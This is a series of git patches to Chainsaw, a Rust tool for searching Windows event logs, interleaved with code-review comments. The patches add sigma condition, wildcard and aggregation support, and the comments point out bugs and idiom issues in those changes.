files.extend(get_files(path, &extension, skip_errors)?); } + if files.len() == 0 { + return Err(anyhow::anyhow!( + "No event logs were found in the provided paths" + )); + } let mut searcher = Searcher::builder() .ignore_case(ignore_case) .load_unknown(load_unknown) From ec2936967f9c08e73aace958dec208e03e68f7de Mon Sep 17 00:00:00 2001 
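Review bot: The doc comment on `path` in the `Search` command (hunk `@@ -102,7 +102,7`) now reads `/// The paths containing event logs to hunt through.`, which is the `Hunt` wording copied over; this text is what `--help` prints, so it should be `/// The paths containing event logs to search through.` for the search subcommand.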
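Review bot: `if files.len() == 0` in hunk `@@ -283,6 +283,11` (and again in `@@ -376,8 +381,14`) is the non-idiomatic form; `if files.is_empty()` says the same and is what clippy asks for. The new error also does not say which paths were scanned, which is the first thing a user needs when a directory was mistyped: `"No event logs were found in the provided paths: {:?}", path` (the loop variable is `paths` in the second hunk) costs nothing and avoids a second run. Both hunks sit inside `run`, which starts and ends outside them.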
From: FranticTyping Date: Sun, 12 Jun 2022 00:39:12 +0100 Subject: [PATCH 20/77] removing troubleshooting message --- src/main.rs | 1 - 1 file changed, 1 deletion(-) diff --git a/src/main.rs b/src/main.rs index 2daeea76..decb8087 100644 --- a/src/main.rs +++ b/src/main.rs @@ -381,7 +381,6 @@ fn run() -> Result<()> { } let mut files = vec![]; for path in &paths { - println!("foo: {}", path.display()); files.extend(get_files(path, &extension, skip_errors)?); } if files.len() == 0 { From 8bb381cc3ceef2ab1ab3f5dc9a630d6f0cebf638 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Mon, 13 Jun 2022 23:09:48 +0100 Subject: [PATCH 21/77] feat: improve linter output and also bring in the new tau engine improvements and enable its optimisations. --- Cargo.lock | 16 ++++++------ src/ext/tau.rs | 14 ++++++++--- src/lib.rs | 2 +- src/main.rs | 48 ++++++++++++++++++++++++++++------- src/rule/chainsaw.rs | 13 +++++++++- src/rule/mod.rs | 60 ++++++++++++++++++++++++++++++++------------ 6 files changed, 114 insertions(+), 39 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 9dd61ebe..507b9d06 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -1041,9 +1041,9 @@ checksum = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd" [[package]] name = "semver" -version = "1.0.9" +version = "1.0.10" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8cb243bdfdb5936c8dc3c45762a19d12ab4550cdc753bc247637d4ec35a040fd" +checksum = "a41d061efea015927ac527063765e73601444cdc344ba855bc7bd44578b25e1c" dependencies = [ "serde", ] @@ -1186,9 +1186,9 @@ dependencies = [ [[package]] name = "tau-engine" -version = "1.5.0" +version = "1.7.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b5db9c91ce2460b6438363850f0a3c57ef01410da9d041f865c99b2725c5bff4" +checksum = "28a9cf722f2c09f4a81b8367b0329a36067e845904e19ccee432b204ab96d191" dependencies = [ "aho-corasick 0.7.18", "lazy_static", 
@@ -1293,9 +1293,9 @@ dependencies = [ [[package]] name = "tracing" -version = "0.1.34" +version = "0.1.35" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5d0ecdcb44a79f0fe9844f0c4f33a342cbcbb5117de8001e6ba0dc2351327d09" +checksum = "a400e31aa60b9d44a52a8ee0343b5b18566b03a8321e0d321f695cf56e940160" dependencies = [ "cfg-if", "pin-project-lite", @@ -1364,9 +1364,9 @@ checksum = "7fcfc827f90e53a02eaef5e535ee14266c1d569214c6aa70133a624d8a3164ba" [[package]] name = "uuid" -version = "1.1.1" +version = "1.1.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c6d5d669b51467dcf7b2f1a796ce0f955f05f01cafda6c19d6e95f730df29238" +checksum = "dd6469f4314d5f1ffec476e05f17cc9a78bc7a27a6a857842170bdf8d6f98d2f" dependencies = [ "getrandom 0.2.6", "serde", diff --git a/src/ext/tau.rs b/src/ext/tau.rs index f98467ff..79ee31ae 100644 --- a/src/ext/tau.rs +++ b/src/ext/tau.rs @@ -2,7 +2,7 @@ use aho_corasick::AhoCorasickBuilder; use serde::de; use serde_yaml::Value as Yaml; use tau_engine::core::parser::{ - parse_identifier, BoolSym, Expression, IdentifierParser, MatchType, MiscSym, Pattern, Search, + parse_identifier, BoolSym, Expression, IdentifierParser, MatchType, ModSym, Pattern, Search, }; pub fn deserialize_expression<'de, D>(deserializer: D) -> Result @@ -41,7 +41,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { let mut not = false; let (field, key) = if key.starts_with("int(") && key.ends_with(")") { let key = key[4..key.len() - 1].to_owned(); - (Expression::Cast(key.to_owned(), MiscSym::Int), key) + (Expression::Cast(key.to_owned(), ModSym::Int), key) } else if key.starts_with("not(") && key.ends_with(")") { not = true; let key = key[4..key.len() - 1].to_owned(); 
@@ -49,7 +49,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { } else if key.starts_with("str(") && key.ends_with(")") { cast = true; let key = key[4..key.len() - 1].to_owned(); - (Expression::Cast(key.to_owned(), MiscSym::Str), key) + (Expression::Cast(key.to_owned(), ModSym::Str), key) } else { (Expression::Field(key.to_owned()), key.to_owned()) }; @@ -109,7 +109,9 @@ pub fn parse_kv(kv: &str) -> crate::Result { Box::new(Expression::Float(i)), ), Pattern::Any => Expression::Search(Search::Any, key, cast), - Pattern::Regex(c) => Expression::Search(Search::Regex(c), key, cast), + Pattern::Regex(c) => { + Expression::Search(Search::Regex(c, identifier.ignore_case), key, cast) + } Pattern::Contains(c) => Expression::Search( if identifier.ignore_case { Search::AhoCorasick( @@ -120,6 +122,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { .build(vec![c.clone()]), ), vec![MatchType::Contains(c)], + identifier.ignore_case, ) } else { Search::Contains(c) @@ -137,6 +140,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { .build(vec![c.clone()]), ), vec![MatchType::EndsWith(c)], + identifier.ignore_case, ) } else { Search::EndsWith(c) @@ -154,6 +158,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { .build(vec![c.clone()]), ), vec![MatchType::Exact(c)], + identifier.ignore_case, ) } else { Search::Exact(c) @@ -171,6 +176,7 @@ pub fn parse_kv(kv: &str) -> crate::Result { .build(vec![c.clone()]), ), vec![MatchType::StartsWith(c)], + identifier.ignore_case, ) } else { Search::StartsWith(c) diff --git a/src/lib.rs b/src/lib.rs index 41187182..cfc722e2 100644 --- a/src/lib.rs +++ b/src/lib.rs @@ -5,7 +5,7 @@ pub(crate) use anyhow::Result; pub use file::{evtx, get_files, Reader}; pub use hunt::{Hunter, HunterBuilder}; -pub use rule::{lint_rule, load_rule, sigma, Kind as RuleKind}; +pub use rule::{chainsaw::Filter, lint_rule, load_rule, sigma, Kind as RuleKind}; pub use search::{Searcher, SearcherBuilder}; pub use write::{set_writer, Format, Writer, WRITER}; 
diff --git a/src/main.rs b/src/main.rs index 56069d5a..658e2ebb 100644 --- a/src/main.rs +++ b/src/main.rs @@ -10,7 +10,8 @@ use chrono_tz::Tz; use structopt::StructOpt; use chainsaw::{ - cli, get_files, lint_rule, load_rule, set_writer, Format, Hunter, RuleKind, Searcher, Writer, + cli, get_files, lint_rule, load_rule, set_writer, Filter, Format, Hunter, RuleKind, Searcher, + Writer, }; #[derive(StructOpt)] @@ -94,6 +95,9 @@ enum Command { /// The kind of rule to lint. #[structopt(long = "kind", default_value = "chainsaw")] kind: RuleKind, + /// Output tau logic. + #[structopt(short = "t", long = "tau")] + tau: bool, }, /// Search through event logs for specific event IDs and/or keywords 
@@ -313,26 +317,52 @@ fn run() -> Result<()> { detections.len() ); } - Command::Lint { path, kind } => { + Command::Lint { path, kind, tau } => { init_writer(None, false, false, false)?; if !opts.no_banner { print_title(); } - cs_eprintln!("[+] Validating supplied detection rules..."); + cs_eprintln!("[+] Validating as {} for supplied detection rules...", kind); let mut count = 0; let mut failed = 0; for file in get_files(&path, &None, false)? { - if let Err(e) = lint_rule(&kind, &file) { - failed += 1; - cs_eprintln!("[!] {}", e); - continue; + match lint_rule(&kind, &file) { + Ok(filters) => { + if tau { + cs_eprintln!("[+] Rule {}:", file.to_string_lossy()); + for filter in filters { + let yaml = match filter { + Filter::Detection(mut d) => { + d.expression = tau_engine::core::optimiser::coalesce( + d.expression, + &d.identifiers, + ); + d.identifiers.clear(); + d.expression = + tau_engine::core::optimiser::shake(d.expression, true); + serde_yaml::to_string(&d)? + } + Filter::Expression(_) => { + cs_eyellowln!("[!] Tau does not support visual representation of expressions"); + continue; + } + }; + println!("{}", yaml); + } + } + } + Err(e) => { + failed += 1; + cs_eprintln!("[!] {}", e); + continue; + } } count += 1; } cs_eprintln!( - "[+] Validated {} detection rules ({} were not loaded)", + "[+] Validated {} detection rules out of {}", count, - failed + count + failed ); } Command::Search { diff --git a/src/rule/chainsaw.rs b/src/rule/chainsaw.rs index dd1725e6..a56f107e 100644 --- a/src/rule/chainsaw.rs +++ b/src/rule/chainsaw.rs @@ -8,6 +8,7 @@ use serde::{ Deserialize, Serialize, }; use tau_engine::core::{ + optimiser, parser::{Expression, Pattern}, Detection, }; 
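Review bot: The `tau` branch re-applies `optimiser::coalesce` and `optimiser::shake` to the `Filter::Detection` it receives, but `chainsaw::load` (src/rule/chainsaw.rs, same commit) already performs exactly that sequence on load, so chainsaw rules are optimised twice here, while the sigma and stalker arms of `lint_rule` (src/rule/mod.rs, same commit) return `r.tau.detection` un-optimised even though `load_rule` hunts with `rule.tau.optimise(true, true)`. The `--tau` output is therefore not quite "the logic that will run" for every rule kind. Performing the optimisation once inside `lint_rule`, so each arm returns the form the hunter uses, and leaving this branch to serialise would remove both the duplication and the discrepancy. `run` starts and ends outside this hunk.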
@@ -196,6 +197,16 @@ pub fn load(rule: &Path) -> crate::Result { let mut contents = String::new(); file.read_to_string(&mut contents)?; - let rule: Rule = serde_yaml::from_str(&contents)?; + let mut rule: Rule = serde_yaml::from_str(&contents)?; + rule.filter = match rule.filter { + Filter::Detection(mut detection) => { + detection.expression = + optimiser::coalesce(detection.expression, &detection.identifiers); + detection.identifiers.clear(); + detection.expression = optimiser::shake(detection.expression, true); + Filter::Detection(detection) + } + Filter::Expression(expression) => Filter::Expression(optimiser::shake(expression, true)), + }; Ok(rule) } diff --git a/src/rule/mod.rs b/src/rule/mod.rs index 2afbb2f8..3819b4e9 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -1,3 +1,4 @@ +use std::fmt; use std::path::Path; use std::str::FromStr; @@ -5,7 +6,7 @@ use serde::{Deserialize, Serialize}; use crate::file::Kind as FileKind; -pub use self::chainsaw::Rule as Chainsaw; +pub use self::chainsaw::{Filter, Rule as Chainsaw}; pub use self::sigma::Rule as Sigma; pub use self::stalker::Rule as Stalker; @@ -27,6 +28,16 @@ impl Default for Kind { } } +impl fmt::Display for Kind { + fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { + match self { + Self::Chainsaw => write!(f, "chainsaw"), + Self::Sigma => write!(f, "sigma"), + Self::Stalker => write!(f, "stalker"), + } + } +} + impl FromStr for Kind { type Err = anyhow::Error; @@ -92,7 +103,7 @@ pub fn load_rule(path: &Path) -> crate::Result> { fields: vec![], - filter: chainsaw::Filter::Detection(rule.tau.detection), + filter: chainsaw::Filter::Detection(rule.tau.optimise(true, true).detection), aggregate: None, }, @@ -123,7 +134,7 @@ pub fn load_rule(path: &Path) -> crate::Result> { fields: vec![], - filter: chainsaw::Filter::Detection(rule.tau.detection), + filter: chainsaw::Filter::Detection(rule.tau.optimise(true, true).detection), aggregate: None, }, 
@@ -135,18 +146,32 @@ pub fn load_rule(path: &Path) -> crate::Result> { Ok(rules) } -pub fn lint_rule(kind: &Kind, path: &Path) -> crate::Result<()> { +pub fn lint_rule(kind: &Kind, path: &Path) -> crate::Result> { if let Some(x) = path.extension() { if x != "yml" && x != "yaml" { anyhow::bail!("rule must have a yaml file extension"); } } - match kind { - Kind::Chainsaw => { - unimplemented!() - } - Kind::Sigma => { - if let Err(e) = sigma::load(path) { + let detections = match kind { + Kind::Chainsaw => match chainsaw::load(path) { + Ok(rule) => { + vec![rule.filter] + } + Err(e) => { + let file_name = match path.to_string_lossy().split('/').last() { + Some(e) => e.to_string(), + None => path.display().to_string(), + }; + anyhow::bail!("{:?}: {}", file_name, e); + } + }, + Kind::Sigma => match sigma::load(path) { + Ok(yamls) => yamls + .into_iter() + .filter_map(|y| serde_yaml::from_value::(y).ok()) + .map(|r| Filter::Detection(r.tau.detection)) + .collect(), + Err(e) => { let file_name = match path.to_string_lossy().split('/').last() { Some(e) => e.to_string(), None => path.display().to_string(), @@ -157,16 +182,19 @@ pub fn lint_rule(kind: &Kind, path: &Path) -> crate::Result<()> { anyhow::bail!("{:?}: {}", file_name, e); } } - } - Kind::Stalker => { - if let Err(e) = stalker::load(path) { + }, + Kind::Stalker => match stalker::load(path) { + Ok(rule) => { + vec![Filter::Detection(rule.tau.detection)] + } + Err(e) => { let file_name = match path.to_string_lossy().split('/').last() { Some(e) => e.to_string(), None => path.display().to_string(), }; anyhow::bail!("{:?}: {}", file_name, e); } - } - } - Ok(()) + }, + }; + Ok(detections) } From 470d81fae26864de99d4720cee0f98e84eb6ebda Mon Sep 17 00:00:00 2001 
From: Alex Kornitzer Date: Fri, 17 Jun 2022 16:31:30 +0100 Subject: [PATCH 22/77] feat: add support for all of and 1 of in sigma conditions --- src/rule/sigma.rs | 132 ++++++++++++++++++++++++++++++++++++++-------- 1 file changed, 111 insertions(+), 21 deletions(-) diff --git a/src/rule/sigma.rs b/src/rule/sigma.rs index 478c5f3a..26422967 100644 --- a/src/rule/sigma.rs +++ b/src/rule/sigma.rs 
@@ -222,38 +222,128 @@ fn prepare(detection: Detection, extra: Option) -> Result condition: Some("of(A, 1)".into()), identifiers, } - } else if let Some(d) = extra { + } else { + let condition = match c { + Yaml::String(c) => c, + Yaml::Sequence(s) => { + if s.len() == 1 { + let x = s.iter().next().expect("could not get condition"); + if let Yaml::String(c) = x { + c + } else { + anyhow::bail!("condition must be a string"); + } + } else { + anyhow::bail!("condition must be a string"); + } + } + _ => anyhow::bail!("condition must be a string"), + }; let mut identifiers = detection.identifiers; - for (k, v) in d.identifiers { - match identifiers.remove(&k) { - Some(i) => match (i, v) { - (Yaml::Mapping(mut m), Yaml::Mapping(v)) => { - for (x, y) in v { - m.insert(x, y); + let mut index = 0; + let mut mutated = vec![]; + let mut parts = condition.split_whitespace(); + while let Some(part) = parts.next() { + let part = if let Some(part) = part.strip_prefix("(") { + mutated.push("(".to_owned()); + part + } else { + part + }; + match part { + "all" | "1" => { + if let Some(next) = parts.next() { + if next != "of" { + mutated.push(part.to_owned()); + mutated.push(next.to_owned()); + continue; + } + + if let Some(ident) = parts.next() { + let mut bracket = false; + let ident = if let Some(ident) = ident.strip_suffix(")") { + bracket = true; + ident + } else { + ident + }; + if let Some(ident) = ident.strip_suffix("*") { + let mut scratch = vec![]; + let mut keys = vec![]; + for (k, _) in &identifiers { + if let Yaml::String(key) = k { + if key.starts_with(ident) { + keys.push(k.clone()); + } + } + } + for key in keys { + if let Some(v) = identifiers.get(&key) { + scratch.push(v.clone()); + } + } + if scratch.is_empty() { + anyhow::bail!("could not find any applicable identifiers"); + } + let key = format!("tau_{}", index); + if part == "all" { + mutated.push(format!("all({})", key)); + } else if part == "1" { + mutated.push(format!("of({}, 1)", key)); + } + 
identifiers.insert(Yaml::String(key), Yaml::Sequence(scratch)); + mutated.push(")".to_owned()); + index += 1; + continue; + } else { + if part == "all" { + mutated.push(format!("all({})", ident)); + } else if part == "1" { + mutated.push(format!("of({}, 1)", ident)); + } + mutated.push(")".to_owned()); + continue; + } } - identifiers.insert(k, Yaml::Mapping(m)); } - (Yaml::Sequence(s), Yaml::Mapping(v)) => { - let mut z = vec![]; - for mut ss in s.into_iter() { - if let Some(m) = ss.as_mapping_mut() { - for (x, y) in v.clone() { - m.insert(x, y); + } + _ => {} + } + mutated.push(part.to_owned()); + } + let condition = mutated.join(" "); + if let Some(d) = extra { + for (k, v) in d.identifiers { + match identifiers.remove(&k) { + Some(i) => match (i, v) { + (Yaml::Mapping(mut m), Yaml::Mapping(v)) => { + for (x, y) in v { + m.insert(x, y); + } + identifiers.insert(k, Yaml::Mapping(m)); + } + (Yaml::Sequence(s), Yaml::Mapping(v)) => { + let mut z = vec![]; + for mut ss in s.into_iter() { + if let Some(m) = ss.as_mapping_mut() { + for (x, y) in v.clone() { + m.insert(x, y); + } } + z.push(ss); } - z.push(ss); + identifiers.insert(k, Yaml::Sequence(z)); } - identifiers.insert(k, Yaml::Sequence(z)); + (_, _) => anyhow::bail!("unsupported rule collection format"), + }, + None => { + identifiers.insert(k, v); } - (_, _) => anyhow::bail!("unsupported rule collection format"), - }, - None => { - identifiers.insert(k, v); } } } detection = Detection { - condition, + condition: Some(Yaml::String(condition)), identifiers, } } From e0a7d09e619def84c95c7a947fe0668b61736f9d Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Sat, 18 Jun 2022 09:57:52 +0100 Subject: [PATCH 23/77] feat(sigma): support nested wildcards Chainsaw will now convert nested wildcard logic into regex so that is can be used by tau. --- src/rule/sigma.rs | 49 ++++++++++++++++++++++++++++++++++++++--------- 1 file changed, 40 insertions(+), 9 deletions(-) 
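Review bot: In the `"all" | "1"` arm, when `of` is the last token (`... or 1 of`), the inner `parts.next()` yields `None`, control falls out of the `if let`, and the trailing `mutated.push(part.to_owned())` emits only `1`/`all` — the `of` token has already been consumed, so a malformed condition is silently rewritten rather than rejected; an `else { anyhow::bail!("missing identifier after 'of'") }` on that `if let` keeps such rules out of the hunt. Two smaller points in the same hunk: `strip_prefix("(")`/`strip_suffix(")")` strip a single bracket, so `((1 of foo*))` leaves `(1` and `foo*)` unrecognised, and sigma's `1 of them`/`all of them` is not handled — `them` would be treated as a literal identifier name. `prepare` begins before this hunk.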
diff --git a/src/rule/sigma.rs b/src/rule/sigma.rs index 26422967..943c8489 100644 --- a/src/rule/sigma.rs +++ b/src/rule/sigma.rs @@ -99,7 +99,7 @@ trait Match { fn as_contains(&self) -> String; fn as_endswith(&self) -> String; fn as_match(&self) -> Option; - fn as_regex(&self) -> Option; + fn as_regex(&self, convert: bool) -> Option; fn as_startswith(&self) -> String; } @@ -128,9 +128,32 @@ impl Match for String { } Some(format!("i{}", self)) } - fn as_regex(&self) -> Option { - let _ = Regex::new(self).ok()?; - Some(format!("?{}", self)) + fn as_regex(&self, convert: bool) -> Option { + if convert { + let literal = regex::escape(self); + let mut scratch = Vec::with_capacity(literal.len()); + let mut escaped = false; + for c in literal.chars() { + match c { + '*' | '?' => { + if !escaped { + scratch.push('.'); + } + } + '\\' => { + escaped = !escaped; + } + _ => { + escaped = false; + } + } + scratch.push(c); + } + Some(format!("?{}", scratch.into_iter().collect::())) + } else { + let _ = Regex::new(self).ok()?; + Some(format!("?{}", self)) + } } fn as_startswith(&self) -> String { format!("i{}*", self) @@ -159,7 +182,7 @@ fn parse_identifier(value: &Yaml, modifiers: &HashSet) -> Result { } else if modifiers.contains("endswith") { Yaml::String(s.as_endswith()) } else if modifiers.contains("re") { - let r = match s.as_regex() { + let r = match s.as_regex(false) { Some(r) => r, None => { return Err(anyhow!(s.to_owned()).context("unsupported regex")); @@ -172,7 +195,11 @@ fn parse_identifier(value: &Yaml, modifiers: &HashSet) -> Result { let s = match s.as_match() { Some(s) => s, None => { - return Err(anyhow!(s.to_owned()).context("unsupported match")); + if let Some(r) = s.as_regex(true) { + r + } else { + return Err(anyhow!(s.to_owned()).context("unsupported match")); + } } }; Yaml::String(s) 
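Review bot: The `convert` branch of `as_regex` never emits a wildcard as far as I can trace it: `regex::escape` has already turned every `*`/`?` into `\*`/`\?`, so when the loop reaches one of them `escaped` is always true, only the literal character is pushed, and the result equals `regex::escape(self)` — the nested-wildcard match this commit sets out to support is lost. The `?` case is also mapped to `.?` (zero or one character) where sigma's `?` means exactly one character. Walking the unescaped input and escaping each non-wildcard character individually gives the intended pattern; `test_match_regex` only covers `as_regex(false)`, so a case such as `assert_eq!("foo*bar".to_owned().as_regex(true).unwrap(), "?foo.*bar")` would pin it.
```rust
fn as_regex(&self, convert: bool) -> Option<String> {
    if convert {
        // Walk the raw value: an unescaped '*' / '?' is a sigma wildcard,
        // every other character is escaped for the regex engine one at a time.
        let mut scratch = String::with_capacity(self.len() + 8);
        let mut escaped = false;
        for c in self.chars() {
            match c {
                '\\' if !escaped => escaped = true,
                '*' if !escaped => scratch.push_str(".*"),
                '?' if !escaped => scratch.push('.'),
                _ => {
                    scratch.push_str(&regex::escape(&c.to_string()));
                    escaped = false;
                }
            }
        }
        Some(format!("?{}", scratch))
    } else {
        // … unchanged: Regex::new validation and "?{}" formatting …
    }
}
```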
@@ -292,7 +319,9 @@ fn prepare(detection: Detection, extra: Option) -> Result mutated.push(format!("of({}, 1)", key)); } identifiers.insert(Yaml::String(key), Yaml::Sequence(scratch)); - mutated.push(")".to_owned()); + if bracket { + mutated.push(")".to_owned()); + } index += 1; continue; } else { @@ -301,7 +330,9 @@ fn prepare(detection: Detection, extra: Option) -> Result } else if part == "1" { mutated.push(format!("of({}, 1)", ident)); } - mutated.push(")".to_owned()); + if bracket { + mutated.push(")".to_owned()); + } continue; } } @@ -607,7 +638,7 @@ mod tests { #[test] fn test_match_regex() { let x = "foobar".to_owned(); - assert_eq!(x.as_regex().unwrap(), "?foobar"); + assert_eq!(x.as_regex(false).unwrap(), "?foobar"); } #[test] From bc3779a5e6921daba08de00dc517f081c462308b Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Sat, 18 Jun 2022 11:37:25 +0100 Subject: [PATCH 24/77] feat(hunt): add initial support for sigma aggregations --- mappings/sigma-event-logs.yml | 3 ++ src/cli.rs | 1 + src/hunt.rs | 54 ++++++++++++++++---- src/rule/mod.rs | 5 +- src/rule/sigma.rs | 93 ++++++++++++++++++++++++++++++++--- 5 files changed, 138 insertions(+), 18 deletions(-) diff --git a/mappings/sigma-event-logs.yml b/mappings/sigma-event-logs.yml index 2e9acbcd..2cf419bd 100644 --- a/mappings/sigma-event-logs.yml +++ b/mappings/sigma-event-logs.yml @@ -265,6 +265,9 @@ groups: - name: User from: UserName to: Event.EventData.SubjectUserName + - name: Name + from: TaskName + to: Event.EventData.TaskName # TODO: Can someone check if this is a typo...? - name: Command Line from: CommandLine diff --git a/src/cli.rs b/src/cli.rs index 0c678510..75a6e709 100644 --- a/src/cli.rs +++ b/src/cli.rs 
@@ -121,6 +121,7 @@ pub fn print_detections( .entry(&hunt.group) .or_insert((vec![], HashSet::new())); // NOTE: We only support count in aggs atm so we can inject that value in...! + // NOTE: This will not work for sigma based aggs... if hunt.is_aggregation() { (*headers).0.push("count".to_owned()); (*headers).1.insert("count".to_owned()); diff --git a/src/hunt.rs b/src/hunt.rs index ab28ae03..c2a5cd07 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -374,7 +374,8 @@ impl Hunter { let kind = reader.kind(); // This can be optimised better ;) let mut detections = vec![]; - let mut aggregates: HashMap>)> = HashMap::new(); + let mut aggregates: HashMap<(Uuid, Uuid), (&Aggregate, HashMap>)> = + HashMap::new(); let mut files: HashMap = HashMap::new(); for document in reader.documents() { let document_id = Uuid::new_v4(); @@ -453,11 +454,37 @@ impl Hunter { } }; if hit { - hits.push(Hit { - hunt: hunt.id, - rule: *rid, - timestamp, - }); + if let Some(aggregate) = &rule.aggregate { + files + .insert(document_id, (document.clone(), timestamp)); + let mut hasher = DefaultHasher::new(); + let mut skip = false; + for field in &aggregate.fields { + if let Some(value) = + mapped.find(field).and_then(|s| s.to_string()) + { + value.hash(&mut hasher); + } else { + skip = true; + break; + } + } + if skip { + continue; + } + let id = hasher.finish(); + let aggregates = aggregates + .entry((hunt.id, *rid)) + .or_insert((aggregate, HashMap::new())); + let docs = aggregates.1.entry(id).or_insert(vec![]); + docs.push(document_id); + } else { + hits.push(Hit { + hunt: hunt.id, + rule: *rid, + timestamp, + }); + } } } } 
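Review bot: The aggregation-key block added here — hash each value of `aggregate.fields` into a `DefaultHasher`, set `skip` when one is missing, `continue` — is the same code as the block in hunk `@@ -474,16 +501,23` of this file; a private helper that takes `mapped` and `&aggregate.fields` and returns `Option<u64>` would leave one place to maintain and make the "document lacks a grouping field, so it is left out of the aggregate" rule explicit with a comment. The `continue` sits several loops deep and the enclosing loop header is outside the hunk, so it is worth confirming it only abandons the current rule for this document rather than the remaining rules. Note also that `files.insert(document_id, (document.clone(), timestamp))` keeps a full clone of every document that matches an aggregating rule until the file is finished, which on large logs with a broad rule can grow substantially.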
@@ -474,16 +501,23 @@ impl Hunter { if let Some(aggregate) = aggregate { files.insert(document_id, (document.clone(), timestamp)); let mut hasher = DefaultHasher::new(); + let mut skip = false; for field in &aggregate.fields { if let Some(value) = mapped.find(field).and_then(|s| s.to_string()) { value.hash(&mut hasher); + } else { + skip = true; + break; } } + if skip { + continue; + } let id = hasher.finish(); let aggregates = aggregates - .entry(hunt.id) + .entry((hunt.id, hunt.id)) .or_insert((aggregate, HashMap::new())); let docs = aggregates.1.entry(id).or_insert(vec![]); docs.push(document_id); @@ -515,7 +549,7 @@ impl Hunter { }); } } - for (id, (aggregate, docs)) in aggregates { + for ((hid, rid), (aggregate, docs)) in aggregates { for ids in docs.values() { let hit = match aggregate.count { Pattern::Equal(i) => ids.len() == (i as usize), @@ -544,8 +578,8 @@ impl Hunter { timestamps.sort(); detections.push(Detections { hits: vec![Hit { - hunt: id, - rule: id, + hunt: hid, + rule: rid, timestamp: timestamps .into_iter() .next() diff --git a/src/rule/mod.rs b/src/rule/mod.rs index 3819b4e9..377492e0 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -105,7 +105,10 @@ pub fn load_rule(path: &Path) -> crate::Result> { filter: chainsaw::Filter::Detection(rule.tau.optimise(true, true).detection), - aggregate: None, + aggregate: rule.aggregate.map(|a| chainsaw::Aggregate { + count: a.count, + fields: a.fields, + }), }, kind: Kind::Sigma, }) diff --git a/src/rule/sigma.rs b/src/rule/sigma.rs index 943c8489..c51ee736 100644 --- a/src/rule/sigma.rs +++ b/src/rule/sigma.rs @@ -5,7 +5,7 @@ use std::path::Path; use anyhow::Result; use regex::Regex; -use serde::Deserialize; +use serde::{Deserialize, Serialize}; use serde_yaml::{Mapping, Sequence, Value as Yaml}; use tau_engine::Rule as Tau; 
@@ -17,12 +17,21 @@ pub struct Rule { #[serde(flatten)] pub tau: Tau, + #[serde(default)] + pub aggregate: Option, + pub authors: Vec, pub description: String, pub level: Option, pub status: Option, } +#[derive(Clone, Debug, Deserialize, Serialize)] +pub struct Aggregate { + pub count: String, + pub fields: Vec, +} + #[derive(Clone, Debug, Deserialize, PartialEq)] struct Detection { #[serde(default)] @@ -91,7 +100,14 @@ trait Condition { impl Condition for String { fn unsupported(&self) -> bool { - self.contains('|') | self.contains('*') | self.contains(" of ") + self.contains(" | ") + | self.contains('*') + | self.contains(" avg ") + | self.contains(" of ") + | self.contains(" max ") + | self.contains(" min ") + | self.contains(" near ") + | self.contains(" sum ") } } @@ -210,7 +226,11 @@ fn parse_identifier(value: &Yaml, modifiers: &HashSet) -> Result { Ok(v) } -fn prepare(detection: Detection, extra: Option) -> Result { +fn prepare( + detection: Detection, + extra: Option, +) -> Result<(Detection, Option)> { + let mut aggregate = None; let mut detection = detection; let condition = extra .as_ref() 
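Review bot: `Condition::unsupported` still lists `" of "` and `'*'` in hunk `@@ -91,7 +100,14`, although PATCH 22 rewrites `all of`/`1 of` and `ident*` in `prepare`, and it now lists `" | "` although this very commit adds parsing of the `| count(...)` suffix. Where `unsupported()` is consulted is outside the hunk, so I may be wrong, but if it gates rules before `prepare` runs, the new code is unreachable for exactly the rules it targets; if it only gates what `prepare` cannot rewrite, those entries should go and a comment should state the remaining scope, e.g. `// condition forms prepare() cannot rewrite yet: avg/max/min/near/sum aggregations`.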
@@ -266,6 +286,57 @@ fn prepare(detection: Detection, extra: Option) -> Result } _ => anyhow::bail!("condition must be a string"), }; + let condition = if condition.contains(" | ") { + let (condition, agg) = condition + .split_once(" | ") + .expect("could not split condition"); + let mut parts = agg.split_whitespace(); + let mut fields = vec![]; + // NOTE: We only support count atm... + // agg-function(agg-field) [ by group-field ] comparison-op value + if let Some(kind) = parts.next() { + if let Some(rest) = kind.strip_prefix("count(") { + if let Some(field) = rest.strip_suffix(")") { + if !field.is_empty() { + fields.push(field.to_owned()); + } + } else { + anyhow::bail!("invalid agg function"); + } + } else { + anyhow::bail!("unsupported agg function - {}", kind); + } + } else { + anyhow::bail!("missing agg function"); + } + let mut part = match parts.next() { + Some(part) => part, + None => anyhow::bail!("invalid aggregation"), + }; + if part == "by" { + let field = match parts.next() { + Some(field) => field, + None => anyhow::bail!("missing group field"), + }; + fields.push(field.to_owned()); + part = match parts.next() { + Some(part) => part, + None => anyhow::bail!("invalid aggregation"), + }; + } + let number = match parts.next() { + Some(part) => part, + None => anyhow::bail!("invalid aggregation"), + }; + aggregate = Some(Aggregate { + count: format!("{}{}", part, number), + fields, + }); + condition + } else { + condition + }; + let mut identifiers = detection.identifiers; let mut index = 0; let mut mutated = vec![]; @@ -379,7 +450,7 @@ fn prepare(detection: Detection, extra: Option) -> Result } } } - Ok(detection) + Ok((detection, aggregate)) } fn detections_to_tau(detection: Detection) -> Result { 
